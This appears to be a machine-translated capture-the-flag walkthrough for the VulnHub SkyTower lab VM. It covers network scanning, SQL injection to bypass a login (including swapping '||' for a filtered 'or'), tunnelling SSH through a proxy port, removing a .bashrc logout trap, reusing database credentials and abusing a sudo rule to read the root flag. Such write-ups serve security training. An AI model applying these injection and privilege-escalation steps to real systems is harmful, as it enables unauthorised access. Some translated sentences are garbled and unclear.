VulnHub drone-SkyTower
Download address: https://www.vulnhub.com/entry/skytower-1,96/ After
downloading the drone, open it under VirtualBox, and configure the network card as a bridge.
Task: Elevate privileges and obtain the flag
Environment: both the
attacker and the target are in the 192.168.8.0 segment.
Attacker: kali linux 192.168.8.108
Article Directory
1. Information collection
To infiltrate the target machine, we must first know what the IP of the target machine is. We first use nmap to detect the surviving host.
Command: nmap -sP 192.168.8.0/24
After knowing that the IP of the target machine is 192.168.8.109, continue to use nmap to scan the open ports of the target machine.
Command: nmap -A -p- 192.168.8.109
detects that the target machine has opened ports 22, 80, and 3128, of which port 22 is filtered, and port 3128 is a proxy port. It is guessed that the proxy needs to be turned on to access port 22 of the target machine .
Visit port 80 first.
Seeing the login box, the first reaction is SQL injection, bp captures the packet and clicks to send it in the repeater.
Login failed, as expected, add a single quote after the first admin.
In the sql error report, there is an extra single quotation mark, add a comment after admin' # to
prompt login failure, that is to say, this position is the injection point, try the universal payload to crack the password
11# and the following statement report an error, continue to try order by the number of blasting fields.
der and the following statement report an error, combined with the previous error, the guess or is filtered. Use || instead of or to continue trying the universal payload.
Successfully logged into the webpage. And it shows that the password of account john is hereisjohn.
As mentioned before, it is guessed that port 3128 of the proxy target is required to access port 22. Here, proxytunnel is used to set up a proxy server tunnel. After proxy, the designated access ip is 127.0.0.1, port is 22, and the listening port is 8888. 
Then visit port 22 of the target machine.
You can see that the login has been successful, but the connection was closed immediately, and it prompts Funds have been withdrawn. Now that you are logged in, try to execute the command directly.
View the catalog.
View .bashrc.
You can see that ssh is closed because of the configuration of .bashrc, delete this file and log in to ssh.
You can see that you have successfully logged in. sudo -l Check whether sudo can be used to escalate the privileges. If
it is not possible, enter /var/www to see login.php.
Remember the sql injection on the login.php page, the php file will contain the user name and password of the database, go to login.php to view it.
It can be seen that the password of the root user is also root, and the database is SkyTech, enter mysql to view.
The passwords of the three users are known to us, and the second user can check it first.
This is the sentence again, repeat the previous steps to enter Sara with ssh.
Viewing sudo -l,
you can see that the sara user is allowed to use the sudo command cat or any file in the ls /accounts directory.
Second, right escalation
Find the accounts directory here, and use the sudo ls command to view the contents.
Finally, use the sudo cat command to view the flag.txt file and obtain the root password theskytower.
The right escalation was successful, and the drone has been completed so far.